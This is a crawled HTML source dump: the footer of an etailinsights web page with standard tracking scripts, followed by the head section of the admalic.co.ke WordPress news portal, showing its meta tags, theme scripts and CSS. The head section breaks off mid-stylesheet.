href="https://etailinsights.com/support/">Contact Support</a></li> <li id="menu-item-6909" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6909"><a href="https://etailinsights.com/careers/">Careers</a></li> <li id="menu-item-12188" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12188"><a href="https://ecommerce.etailinsights.com/contact-etailinsights-for-ecommerce-leads">Contact Us</a></li> <li id="menu-item-6907" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6907"><a href="https://etailinsights.com/terms-and-conditions/">Terms</a></li> <li id="menu-item-6906" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6906"><a href="https://etailinsights.com/privacy/">Privacy</a></li> </ul> <div class="x-colophon-content"> <p class='copyright'> Copyright © 2011 - 2018 etailinsights</p> <p>8255 Chapel Hill Rd. Cary, NC 27513 | (919) 650-1227</p> <script type="text/javascript"> _linkedin_data_partner_id = "36385"; </script><script type="text/javascript"> (function(){var s = document.getElementsByTagName("script")[0]; var b = document.createElement("script"); b.type = "text/javascript";b.async = true; b.src = "https://snap.licdn.com/li.lms-analytics/insight.min.js"; s.parentNode.insertBefore(b, s);})(); </script> <noscript> <img height="1" width="1" style="display:none;" alt="" src="https://dc.ads.linkedin.com/collect/?pid=355242&fmt=gif" /> </noscript> </div> </div> </footer> </div> <!-- END .x-site --> </div> <!-- END .x-root --> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-KBDXMJP" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <noscript><img height="1" width="1" style="display: none;" src="https://www.facebook.com/tr?id=122028241995116&ev=PageView&noscript=1" alt="facebook_pixel"></noscript> <noscript><img height="1" width="1" style="display: none;" src="https://www.facebook.com/tr?id=122028241995116&ev=GeneralEvent&noscript=1&cd[post_type]=page&cd[post_id]=12047&cd[content_name]=New+Home+Page+Cornerstone+-+DP+and+Dennis" alt="facebook_pixel"></noscript> <!-- Lightbox Plus Colorbox v2.7.2/1.5.9 - 2013.01.24 - Message: 0--> <script type="text/javascript"> jQuery(document).ready(function($){ $("a[rel*=lightbox]").colorbox({initialWidth:"30%",initialHeight:"30%",maxWidth:"90%",maxHeight:"90%",opacity:0.8}); }); </script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/etailinsights.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='https://etailinsights.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var ajax_tptn_tracker = {"ajax_url":"https:\/\/etailinsights.com\/wp-admin\/admin-ajax.php","top_ten_id":"12047","top_ten_blog_id":"1","activate_counter":"11","top_ten_debug":"0","tptn_rnd":"1275889343"}; /* ]]> */ </script> <script type='text/javascript' src='https://etailinsights.com/wp-content/plugins/top-10/includes/js/top-10-tracker.min.js?ver=1.0'></script> <script type='text/javascript' src='https://etailinsights.com/wp-content/plugins/cornerstone/assets/dist/js/site/cs-body.js?ver=3.5.4'></script> <script type='text/javascript' src='https://etailinsights.com/wp-content/themes/x/framework/dist/js/site/x.js?ver=6.5.5'></script> <script type='text/javascript' src='https://etailinsights.com/wp-includes/js/comment-reply.min.js?ver=5.2'></script> <script type='text/javascript' src='https://etailinsights.com/wp-content/plugins/lightbox-plus/js/jquery.colorbox.1.5.9-min.js?ver=1.5.9'></script> <script type='text/javascript' src='https://etailinsights.com/wp-includes/js/wp-embed.min.js?ver=5.2'></script> </body> </html>
0
<!doctype html > <!--[if IE 8]><html class="ie8" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 9]><html class="ie9" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if gt IE 8]><!--><html lang="en-US" prefix="og: http://ogp.me/ns#"> <!--<![endif]--><head><title>Admalic Kenya | Kenya Information, Tech, Education, Online Marketing Portal</title><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="pingback" href="https://admalic.co.ke/xmlrpc.php" /> <script>window._wca = window._wca || [];</script> <link rel="apple-touch-icon-precomposed" sizes="114x114" href="https://ngnaira.com/storage/2018/10/NGN_icon.jpg" /><link rel="canonical" href="https://admalic.co.ke/" /><meta property="og:locale" content="en_US" /><meta property="og:type" content="website" /><meta property="og:title" content="Admalic Kenya | Kenya Information, Tech, Education, Online Marketing Portal" /><meta property="og:url" content="https://admalic.co.ke/" /><meta property="og:site_name" content="Admalic Kenya" /> <script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"WebSite","@id":"#website","url":"https:\/\/admalic.co.ke\/","name":"Admalic Kenya","potentialAction":{"@type":"SearchAction","target":"https:\/\/admalic.co.ke\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"Organization","url":"https:\/\/admalic.co.ke\/","sameAs":["http:\/\/facebook.com\/schoolgh","https:\/\/twitter.com\/schoolinggh"],"@id":"https:\/\/admalic.co.ke\/#organization","name":"ADMALIC","logo":"https:\/\/admalic.co.ke\/wp-content\/uploads\/2017\/12\/icon.png"}</script> <meta name="google-site-verification" content="-_kiCGE5FL2TQUkMiqb28qlFoVdgFRbgr_AsqfoCo40" /><link rel='dns-prefetch' href='//s0.wp.com' /><link rel='dns-prefetch' href='//secure.gravatar.com' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Admalic Kenya &raquo; Feed" href="https://admalic.co.ke/feed/" /><link rel="alternate" type="application/rss+xml" title="Admalic Kenya &raquo; Comments Feed" href="https://admalic.co.ke/comments/feed/" /><style type="text/css">img.wp-smiley,img.emoji{display:inline!important;border:none!important;box-shadow:none!important;height:1em!important;width:1em!important;margin:0 .07em!important;vertical-align:-0.1em!important;background:none!important;padding:0!important}</style><link rel='stylesheet' id='wp-block-library-css' href='https://c0.wp.com/c/5.2/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='wc-block-style-css' href='https://c0.wp.com/p/woocommerce/3.6.2/assets/css/blocks/style.css' type='text/css' media='all' /><link rel='stylesheet' id='flw_css-css' href='https://admalic.co.ke/wp-content/plugins/rave-payment-forms/assets/css/flw.css' type='text/css' media='all' /><link rel='stylesheet' id='toc-screen-css' href='https://admalic.co.ke/wp-content/cache/busting/1/wp-content/plugins/table-of-contents-plus/screen.min-1509.css' type='text/css' media='all' /><link rel='stylesheet' id='woocommerce-layout-css' href='https://c0.wp.com/p/woocommerce/3.6.2/assets/css/woocommerce-layout.css' type='text/css' media='all' /><style id='woocommerce-layout-inline-css' type='text/css'>.infinite-scroll .woocommerce-pagination{display:none}</style><link rel='stylesheet' id='woocommerce-smallscreen-css' href='https://c0.wp.com/p/woocommerce/3.6.2/assets/css/woocommerce-smallscreen.css' type='text/css' media='only screen and (max-width: 768px)' /><link rel='stylesheet' id='woocommerce-general-css' href='https://c0.wp.com/p/woocommerce/3.6.2/assets/css/woocommerce.css' type='text/css' media='all' /><style id='woocommerce-inline-inline-css' type='text/css'>.woocommerce form .form-row .required{visibility:visible}</style><link rel='stylesheet' id='google-fonts-style-css' href='https://fonts.googleapis.com/css?family=Exo%3A400%7COpen+Sans%3A300%2C400%2C600%2C700%7CRoboto+Condensed%3A300%2C300italic%2C400%2C400italic%2C700%2C700italic&#038;ver=4.7' type='text/css' media='all' /><link rel='stylesheet' id='tablepress-default-css' href='https://admalic.co.ke/wp-content/cache/busting/1/wp-content/plugins/tablepress/css/default.min-1.9.2.css' type='text/css' media='all' /><link rel='stylesheet' id='td-theme-css' href='https://admalic.co.ke/wp-content/cache/busting/1/wp-content/themes/Newsmag/style-4.7.css' type='text/css' media='all' /><link rel='stylesheet' id='td-theme-child-css' href='https://admalic.co.ke/wp-content/cache/busting/1/wp-content/themes/Newsmag-child/style-4.7c.css' type='text/css' media='all' /><link rel='stylesheet' id='td-theme-woo-css' href='https://admalic.co.ke/wp-content/cache/busting/1/wp-content/themes/Newsmag/style-woocommerce-4.7.css' type='text/css' media='all' /><link rel='stylesheet' id='jetpack_css-css' href='https://c0.wp.com/p/jetpack/7.3.1/css/jetpack.css' type='text/css' media='all' /> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/jquery.js' defer></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/jquery-migrate.min.js' defer></script> <script type='text/javascript' src='https://admalic.co.ke/wp-content/cache/busting/1/wp-content/plugins/wp-hide-post/public/js/wp-hide-post-public-2.0.10.js' defer></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/postmessage.min.js' defer></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/jquery.jetpack-resize.min.js' defer></script> <link rel='https://api.w.org/' href='https://admalic.co.ke/wp-json/' /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://admalic.co.ke/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://admalic.co.ke/wp-includes/wlwmanifest.xml" /><meta name="generator" content="WordPress 5.2" /><meta name="generator" content="WooCommerce 3.6.2" /><link rel='shortlink' href='https://wp.me/PauMJD-1pn' /><link rel='dns-prefetch' href='//v0.wordpress.com' /><link rel='dns-prefetch' href='//widgets.wp.com' /><link rel='dns-prefetch' href='//s0.wp.com' /><link rel='dns-prefetch' href='//0.gravatar.com' /><link rel='dns-prefetch' href='//1.gravatar.com' /><link rel='dns-prefetch' href='//2.gravatar.com' /><link rel='dns-prefetch' href='//i0.wp.com' /><link rel='dns-prefetch' href='//i1.wp.com' /><link rel='dns-prefetch' href='//i2.wp.com' /><link rel='dns-prefetch' href='//c0.wp.com' /><link rel='dns-prefetch' href='//jetpack.wordpress.com' /><link rel='dns-prefetch' href='//s1.wp.com' /><link rel='dns-prefetch' href='//s2.wp.com' /><link rel='dns-prefetch' href='//public-api.wordpress.com' /><style type='text/css'>img#wpstats{display:none}</style> <script>window.tdwGlobal = {"adminUrl":"https:\/\/admalic.co.ke\/wp-admin\/","wpRestNonce":"22eaf12734","wpRestUrl":"https:\/\/admalic.co.ke\/wp-json\/","permalinkStructure":"\/%postname%\/"};</script> <!--[if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.js"></script><![endif]--> <noscript><style>.woocommerce-product-gallery{opacity:1!important}</style></noscript><meta name="onesignal" content="wordpress-plugin" /><link rel="manifest" href="https://admalic.co.ke/wp-content/plugins/onesignal-free-web-push-notifications/sdk_files/manifest.json.php?gcm_sender_id=" /> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async></script> <script>window.OneSignal = window.OneSignal || []; OneSignal.push( function() { OneSignal.SERVICE_WORKER_UPDATER_PATH = "OneSignalSDKUpdaterWorker.js.php"; OneSignal.SERVICE_WORKER_PATH = "OneSignalSDKWorker.js.php"; OneSignal.SERVICE_WORKER_PARAM = { scope: '/' }; OneSignal.setDefaultNotificationUrl("https://admalic.co.ke"); var oneSignal_options = {}; window._oneSignalInitOptions = oneSignal_options; oneSignal_options['wordpress'] = true; oneSignal_options['appId'] = 'f248fe29-b15b-4a85-9ab2-2dc6cb2ad888'; oneSignal_options['autoRegister'] = true; oneSignal_options['welcomeNotification'] = { }; oneSignal_options['welcomeNotification']['title'] = ""; oneSignal_options['welcomeNotification']['message'] = ""; oneSignal_options['path'] = "https://admalic.co.ke/wp-content/plugins/onesignal-free-web-push-notifications/sdk_files/"; oneSignal_options['promptOptions'] = { }; OneSignal.init(window._oneSignalInitOptions); }); function documentInitOneSignal() { var oneSignal_elements = document.getElementsByClassName("OneSignal-prompt"); var oneSignalLinkClickHandler = function(event) { OneSignal.push(['registerForPushNotifications']); event.preventDefault(); }; for(var i = 0; i < oneSignal_elements.length; i++) oneSignal_elements[i].addEventListener('click', oneSignalLinkClickHandler, false); } if (document.readyState === 'complete') { documentInitOneSignal(); } else { window.addEventListener("load", function(event){ documentInitOneSignal(); }); }</script> <script>var tdBlocksArray = []; //here we store all the items for the current page //td_block class - each ajax block uses a object of this class for requests function tdBlock() { this.id = ''; this.block_type = 1; //block type id (1-234 etc) this.atts = ''; this.td_column_number = ''; this.td_current_page = 1; // this.post_count = 0; //from wp this.found_posts = 0; //from wp this.max_num_pages = 0; //from wp this.td_filter_value = ''; //current live filter value this.is_ajax_running = false; this.td_user_action = ''; // load more or infinite loader (used by the animation) this.header_color = ''; this.ajax_pagination_infinite_stop = ''; //show load more at page x } // td_js_generator - mini detector (function(){ var htmlTag = document.getElementsByTagName("html")[0]; if ( navigator.userAgent.indexOf("MSIE 10.0") > -1 ) { htmlTag.className += ' ie10'; } if ( !!navigator.userAgent.match(/Trident.*rv\:11\./) ) { htmlTag.className += ' ie11'; } if ( navigator.userAgent.indexOf("Edge") > -1 ) { htmlTag.className += ' ieEdge'; } if ( /(iPad|iPhone|iPod)/g.test(navigator.userAgent) ) { htmlTag.className += ' td-md-is-ios'; } var user_agent = navigator.userAgent.toLowerCase(); if ( user_agent.indexOf("android") > -1 ) { htmlTag.className += ' td-md-is-android'; } if ( -1 !== navigator.userAgent.indexOf('Mac OS X') ) { htmlTag.className += ' td-md-is-os-x'; } if ( /chrom(e|ium)/.test(navigator.userAgent.toLowerCase()) ) { htmlTag.className += ' td-md-is-chrome'; } if ( -1 !== navigator.userAgent.indexOf('Firefox') ) { htmlTag.className += ' td-md-is-firefox'; } if ( -1 !== navigator.userAgent.indexOf('Safari') && -1 === navigator.userAgent.indexOf('Chrome') ) { htmlTag.className += ' td-md-is-safari'; } if( -1 !== navigator.userAgent.indexOf('IEMobile') ){ htmlTag.className += ' td-md-is-iemobile'; } })(); var tdLocalCache = {}; ( function () { "use strict"; tdLocalCache = { data: {}, remove: function (resource_id) { delete tdLocalCache.data[resource_id]; }, exist: function (resource_id) { return tdLocalCache.data.hasOwnProperty(resource_id) && tdLocalCache.data[resource_id] !== null; }, get: function (resource_id) { return tdLocalCache.data[resource_id]; }, set: function (resource_id, cachedData) { tdLocalCache.remove(resource_id); tdLocalCache.data[resource_id] = cachedData; } }; })(); var td_viewport_interval_list=[{"limitBottom":767,"sidebarWidth":251},{"limitBottom":1023,"sidebarWidth":339}]; var td_animation_stack_effect="type0"; var tds_animation_stack=true; var td_animation_stack_specific_selectors=".entry-thumb, img"; var td_animation_stack_general_selectors=".td-animation-stack img, .td-animation-stack .entry-thumb, .post img"; var td_ajax_url="https:\/\/admalic.co.ke\/wp-admin\/admin-ajax.php?td_theme_name=Newsmag&v=4.7"; var td_get_template_directory_uri="https:\/\/admalic.co.ke\/wp-content\/themes\/Newsmag"; var tds_snap_menu="smart_snap_always"; var tds_logo_on_sticky="show"; var tds_header_style="9"; var td_please_wait="Please wait..."; var td_email_user_pass_incorrect="User or password incorrect!"; var td_email_user_incorrect="Email or username incorrect!"; var td_email_incorrect="Email incorrect!"; var tds_more_articles_on_post_enable=""; var tds_more_articles_on_post_time_to_wait=""; var tds_more_articles_on_post_pages_distance_from_top=0; var tds_theme_color_site_wide="#008800"; var tds_smart_sidebar="enabled"; var tdThemeName="Newsmag"; var td_magnific_popup_translation_tPrev="Previous (Left arrow key)"; var td_magnific_popup_translation_tNext="Next (Right arrow key)"; var td_magnific_popup_translation_tCounter="%curr% of %total%"; var td_magnific_popup_translation_ajax_tError="The content from %url% could not be loaded."; var td_magnific_popup_translation_image_tError="The image #%curr% could not be loaded."; var tdDateNamesI18n={"month_names":["January","February","March","April","May","June","July","August","September","October","November","December"],"month_names_short":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"day_names":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"day_names_short":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"]}; var td_ad_background_click_link=""; var td_ad_background_click_target="";</script> <style>body{background-color:#efefef}.td-header-border:before,.td-trending-now-title,.td_block_mega_menu .td_mega_menu_sub_cats .cur-sub-cat,.td-post-category:hover,.td-header-style-2 .td-header-sp-logo,.td-next-prev-wrap a:hover i,.page-nav .current,.widget_calendar tfoot a:hover,.td-footer-container .widget_search .wpb_button:hover,.td-scroll-up-visible,.dropcap,.td-category a,input[type="submit"]:hover,.td-post-small-box a:hover,.td-404-sub-sub-title a:hover,.td-rating-bar-wrap div,.td_top_authors .td-active .td-author-post-count,.td_top_authors .td-active .td-author-comments-count,.td_smart_list_3 .td-sml3-top-controls i:hover,.td_smart_list_3 .td-sml3-bottom-controls i:hover,.td_wrapper_video_playlist .td_video_controls_playlist_wrapper,.td-read-more a:hover,.td-login-wrap .btn,.td_display_err,.td-header-style-6 .td-top-menu-full,#bbpress-forums button:hover,#bbpress-forums .bbp-pagination .current,.bbp_widget_login .button:hover,.header-search-wrap .td-drop-down-search .btn:hover,.td-post-text-content .more-link-wrap:hover a,#buddypress div.item-list-tabs ul li>a span,#buddypress div.item-list-tabs ul li>a:hover span,#buddypress input[type=submit]:hover,#buddypress a.button:hover span,#buddypress div.item-list-tabs ul li.selected a span,#buddypress div.item-list-tabs ul li.current a span,#buddypress input[type=submit]:focus,.td-grid-style-3 .td-big-grid-post .td-module-thumb a:last-child:before,.td-grid-style-4 .td-big-grid-post .td-module-thumb a:last-child:before,.td-grid-style-5 .td-big-grid-post .td-module-thumb:after,.td_category_template_2 .td-category-siblings .td-category a:hover,.td-weather-week:before,.td-weather-information:before,.td_3D_btn,.td_shadow_btn,.td_default_btn,.td_square_btn,.td_outlined_btn:hover{background-color:#080}@media (max-width:767px){.td-category a.td-current-sub-category{background-color:#080}}.woocommerce .onsale,.woocommerce .woocommerce a.button:hover,.woocommerce-page .woocommerce .button:hover,.single-product .product .summary .cart .button:hover,.woocommerce .woocommerce .product a.button:hover,.woocommerce .product a.button:hover,.woocommerce .product #respond input#submit:hover,.woocommerce .checkout input#place_order:hover,.woocommerce .woocommerce.widget .button:hover,.woocommerce .woocommerce-message .button:hover,.woocommerce .woocommerce-error .button:hover,.woocommerce .woocommerce-info .button:hover,.woocommerce.widget .ui-slider .ui-slider-handle,.vc_btn-black:hover,.wpb_btn-black:hover,.item-list-tabs .feed:hover a,.td-smart-list-button:hover{background-color:#008800!important}.td-header-sp-top-menu .top-header-menu>.current-menu-item>a,.td-header-sp-top-menu .top-header-menu>.current-menu-ancestor>a,.td-header-sp-top-menu .top-header-menu>.current-category-ancestor>a,.td-header-sp-top-menu .top-header-menu>li>a:hover,.td-header-sp-top-menu .top-header-menu>.sfHover>a,.top-header-menu ul .current-menu-item>a,.top-header-menu ul .current-menu-ancestor>a,.top-header-menu ul .current-category-ancestor>a,.top-header-menu ul li>a:hover,.top-header-menu ul .sfHover>a,.sf-menu ul .td-menu-item>a:hover,.sf-menu ul .sfHover>a,.sf-menu ul .current-menu-ancestor>a,.sf-menu ul .current-category-ancestor>a,.sf-menu ul .current-menu-item>a,.td_module_wrap:hover .entry-title a,.td_mod_mega_menu:hover .entry-title a,.footer-email-wrap a,.widget a:hover,.td-footer-container .widget_calendar #today,.td-category-pulldown-filter a.td-pulldown-category-filter-link:hover,.td-load-more-wrap a:hover,.td-post-next-prev-content a:hover,.td-author-name a:hover,.td-author-url a:hover,.td_mod_related_posts:hover .entry-title a,.td-search-query,.header-search-wrap .td-drop-down-search .result-msg a:hover,.td_top_authors .td-active .td-authors-name a,.post blockquote p,.td-post-content blockquote p,.page blockquote p,.comment-list cite a:hover,.comment-list cite:hover,.comment-list .comment-reply-link:hover,a,.white-menu #td-header-menu .sf-menu>li>a:hover,.white-menu #td-header-menu .sf-menu>.current-menu-ancestor>a,.white-menu #td-header-menu .sf-menu>.current-menu-item>a,.td_quote_on_blocks,#bbpress-forums .bbp-forum-freshness a:hover,#bbpress-forums .bbp-topic-freshness a:hover,#bbpress-forums .bbp-forums-list li a:hover,#bbpress-forums .bbp-forum-title:hover,#bbpress-forums .bbp-topic-permalink:hover,#bbpress-forums .bbp-topic-started-by a:hover,#bbpress-forums .bbp-topic-started-in a:hover,#bbpress-forums .bbp-body .super-sticky li.bbp-topic-title .bbp-topic-permalink,#bbpress-forums .bbp-body .sticky li.bbp-topic-title .bbp-topic-permalink,#bbpress-forums #subscription-toggle a:hover,#bbpress-forums #favorite-toggle a:hover,.woocommerce-account .woocommerce-MyAccount-navigation a:hover,.widget_display_replies .bbp-author-name,.widget_display_topics .bbp-author-name,.archive .widget_archive .current,.archive .widget_archive .current a,.td-subcategory-header .td-category-siblings .td-subcat-dropdown a.td-current-sub-category,.td-subcategory-header .td-category-siblings .td-subcat-dropdown a:hover,.td-pulldown-filter-display-option:hover,.td-pulldown-filter-display-option .td-pulldown-filter-link:hover,.td_normal_slide .td-wrapper-pulldown-filter .td-pulldown-filter-list a:hover,#buddypress ul.item-list li div.item-title a:hover,.td_block_13 .td-pulldown-filter-list a:hover,.td_smart_list_8 .td-smart-list-dropdown-wrap .td-smart-list-button:hover,.td_smart_list_8 .td-smart-list-dropdown-wrap .td-smart-list-button:hover i,.td-sub-footer-container a:hover,.td-instagram-user a,.td_outlined_btn{color:#080}.td-mega-menu .wpb_content_element li a:hover,.td_login_tab_focus{color:#008800!important}.td-next-prev-wrap a:hover i,.page-nav .current,.widget_tag_cloud a:hover,.post .td_quote_box,.page .td_quote_box,.td-login-panel-title,#bbpress-forums .bbp-pagination .current,.td_category_template_2 .td-category-siblings .td-category a:hover,.page-template-page-pagebuilder-latest .td-instagram-user,.td_outlined_btn{border-color:#080}.td_wrapper_video_playlist .td_video_currently_playing:after,.item-list-tabs .feed:hover{border-color:#008800!important}.td-pb-row [class*="td-pb-span"],.td-pb-border-top,.page-template-page-title-sidebar-php .td-page-content>.wpb_row:first-child,.td-post-sharing,.td-post-content,.td-post-next-prev,.author-box-wrap,.td-comments-title-wrap,.comment-list,.comment-respond,.td-post-template-5 header,.td-container,.wpb_content_element,.wpb_column,.wpb_row,.white-menu .td-header-container .td-header-main-menu,.td-post-template-1 .td-post-content,.td-post-template-4 .td-post-sharing-top,.td-header-style-6 .td-header-header .td-make-full,#disqus_thread,.page-template-page-pagebuilder-title-php .td-page-content>.wpb_row:first-child,.td-footer-container:before{border-color:#d1d1d1}.td-top-border{border-color:#d1d1d1!important}.td-container-border:after,.td-next-prev-separator,.td-container .td-pb-row .wpb_column:before,.td-container-border:before,.td-main-content:before,.td-main-sidebar:before,.td-pb-row .td-pb-span4:nth-of-type(3):after,.td-pb-row .td-pb-span4:nth-last-of-type(3):after{background-color:#d1d1d1}@media (max-width:767px){.white-menu .td-header-main-menu{border-color:#d1d1d1}}.td-header-top-menu,.td-header-wrap .td-top-menu-full{background-color:#000}.td-header-style-1 .td-header-top-menu,.td-header-style-2 .td-top-bar-container,.td-header-style-7 .td-header-top-menu{padding:0 12px;top:0}.td-header-sp-top-menu .top-header-menu>li>a,.td-header-sp-top-menu .td_data_time,.td-header-sp-top-menu .td-weather-top-widget{color:#f4f4f4}.td-header-main-menu{background-color:#00ba22}@media (max-width:767px){body .td-header-wrap .td-header-main-menu{background-color:#00ba22}}.td-menu-background:before,.td-search-background:before{background:rgba(0,0,0,.5);background:-moz-linear-gradient(top,rgba(0,0,0,.5) 0%,rgba(0,0,0,.6) 100%);background:-webkit-gradient(left top,left bottom,color-stop(0%,rgba(0,0,0,.5)),color-stop(100%,rgba(0,0,0,.6)));background:-webkit-linear-gradient(top,rgba(0,0,0,.5) 0%,rgba(0,0,0,.6) 100%);background:-o-linear-gradient(top,rgba(0,0,0,.5) 0%,@mobileu_gradient_two_mob 100%);background:-ms-linear-gradient(top,rgba(0,0,0,.5) 0%,rgba(0,0,0,.6) 100%);background:linear-gradient(to bottom,rgba(0,0,0,.5) 0%,rgba(0,0,0,.6) 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(0,0,0,0.5)',endColorstr='rgba(0,0,0,0.6)',GradientType=0)}#td-mobile-nav .td-register-section .td-login-button{color:#2c87f0}.td-footer-container,.td-footer-container .td_module_mx3 .meta-info,.td-footer-container .td_module_14 .meta-info,.td-footer-container .td_module_mx1 .td-block14-border{background-color:#a9d68d}.td-footer-container .widget_calendar #today{background-color:transparent}.td-footer-container .block-title>span,.td-footer-container .block-title>a,.td-footer-container .widgettitle,.td-footer-container .widget_rss .block-title .rsswidget{color:#1e1e1e}.td-sub-footer-container{background-color:#0a0a0a}.td-sub-footer-container:after{background-color:transparent}.td-sub-footer-container:before{background-color:transparent}.td-footer-container.td-container{border-bottom-width:0}.td-sub-footer-container,.td-sub-footer-container a{color:#ededed}.td-sub-footer-container li a:before{background-color:#ededed}.top-header-menu li a,.td-header-sp-top-menu .td_data_time,.td-weather-top-widget .td-weather-header .td-weather-city,.td-weather-top-widget .td-weather-now{font-family:Exo}.top-header-menu ul li a{font-family:Exo}.sf-menu>.td-menu-item>a{font-family:Exo}.sf-menu ul .td-menu-item a{font-family:Exo}.td_mod_mega_menu .item-details a{font-family:Exo}.td_mega_menu_sub_cats .block-mega-child-cats a{font-family:Exo}#td-mobile-nav,#td-mobile-nav .wpb_button,.td-search-wrap-mob{font-family:Exo}.td-mobile-content .td-mobile-main-menu>li>a{font-family:Exo}.td-mobile-content .sub-menu a{font-family:Exo}.td_module_wrap .entry-title,.td-theme-slider .td-module-title,.page .td-post-template-6 .td-post-header h1{font-family:Exo}.block-title>span,.block-title>a,.widgettitle,.td-trending-now-title,.wpb_tabs li a,.vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container .vc_tta-tab>a,.td-related-title .td-related-left,.td-related-title .td-related-right,.category .entry-title span,.td-author-counters span,.woocommerce-tabs h2,.woocommerce .product .products h2:not(.woocommerce-loop-product__title){font-family:Exo}.td-big-grid-post .entry-title{font-family:Exo}.post header .entry-title{font-family:Exo}.td-post-template-default header .entry-title{font-family:Exo;font-weight:500}.td-post-template-1 header .entry-title{font-family:Exo}.td-post-template-2 header .entry-title{font-family:Exo}.td-post-template-3 header .entry-title{font-family:Exo}.td-post-template-4 header .entry-title{font-family:Exo}.td-post-template-5 header .entry-title{font-family:Exo}.td-post-template-6 header .entry-title{font-family:Exo}.td-post-template-7 header .entry-title{font-family:Exo}.td-post-template-8 header .entry-title{font-family:Exo}.td-post-content p,.td-post-content{font-family:Exo}.post blockquote p,.page blockquote p,.td-post-text-content blockquote p{font-family:Exo;font-size:14px;text-transform:none}.post .td_quote_box p,.page .td_quote_box p{font-family:Exo;font-size:14px;text-transform:none}.post .td_pull_quote p,.page .td_pull_quote p{font-family:Exo}.td-post-content li{font-family:Exo}.td-post-content h1{font-family:Exo;font-weight:500}.td-post-content h2{font-family:Exo;font-weight:500}.td-post-content h3{font-family:Exo;font-weight:400}.td-post-content h4{font-family:Exo;font-weight:500}.td-post-content h5{font-family:Exo;font-weight:500}.td-post-content h6{font-family:Exo;font-weight:500}.post .td-category a{font-family:Exo}.post header .td-post-author-name,.post header .td-post-author-name a{font-family:Exo}.post header .td-post-date .entry-date{font-family:Exo}.post header .td-post-views span,.post header .td-post-comments{font-family:Exo}.post .td-post-source-tags a,.post .td-post-source-tags span{font-family:Exo}.post .td-post-next-prev-content span{font-family:Exo}.post .td-post-next-prev-content a{font-family:Exo}.post .author-box-wrap .td-author-name a{font-family:Exo}.post .author-box-wrap .td-author-url a{font-family:Exo}.post .author-box-wrap .td-author-description{font-family:Exo}.td_block_related_posts .entry-title{font-family:Exo}.post .td-post-share-title,.td-comments-title-wrap h4,.comment-reply-title{font-family:Exo}.wp-caption-text,.wp-caption-dd{font-family:Exo}.td-post-template-default .td-post-sub-title,.td-post-template-1 .td-post-sub-title,.td-post-template-5 .td-post-sub-title,.td-post-template-7 .td-post-sub-title,.td-post-template-8 .td-post-sub-title{font-family:Exo}.td-post-template-2 .td-post-sub-title,.td-post-template-3 .td-post-sub-title,.td-post-template-4 .td-post-sub-title,.td-post-template-6 .td-post-sub-title{font-family:Exo}.td-page-header h1,.woocommerce-page .page-title{font-family:Exo}.td-page-content p,.td-page-content li,.td-page-content .td_block_text_with_title,.woocommerce-page .page-description>p,.wpb_text_column p{font-family:Exo}.td-page-content h1,.wpb_text_column h1{font-family:Exo}.td-page-content h2,.wpb_text_column h2{font-family:Exo}.td-page-content h3,.wpb_text_column h3{font-family:Exo}.td-page-content h4,.wpb_text_column h4{font-family:Exo}.td-page-content h5,.wpb_text_column h5{font-family:Exo}.td-page-content h6,.wpb_text_column h6{font-family:Exo}.footer-text-wrap{font-family:Exo}.td-sub-footer-copy{font-family:Exo}.td-sub-footer-menu ul li a{font-family:Exo}.category .td-category a{font-family:Exo}.td-trending-now-title{font-family:Exo}.page-nav a,.page-nav span,.page-nav i{font-family:Exo}.td-page-content .dropcap,.td-post-content .dropcap,.comment-content .dropcap{font-family:Exo}.entry-crumbs a,.entry-crumbs span,#bbpress-forums .bbp-breadcrumb a,#bbpress-forums .bbp-breadcrumb .bbp-breadcrumb-current{font-family:Exo}.widget_archive a,.widget_calendar,.widget_categories a,.widget_nav_menu a,.widget_meta a,.widget_pages a,.widget_recent_comments a,.widget_recent_entries a,.widget_text .textwidget,.widget_tag_cloud a,.widget_search input,.woocommerce .product-categories a,.widget_display_forums a,.widget_display_replies a,.widget_display_topics a,.widget_display_views a,.widget_display_stats{font-family:Exo}input[type="submit"],.woocommerce a.button,.woocommerce button.button,.woocommerce #respond input#submit{font-family:Exo}.woocommerce .product a .woocommerce-loop-product__title,.woocommerce .widget.woocommerce .product_list_widget a,.woocommerce-cart .woocommerce .product-name a{font-family:Exo}.woocommerce .product .summary 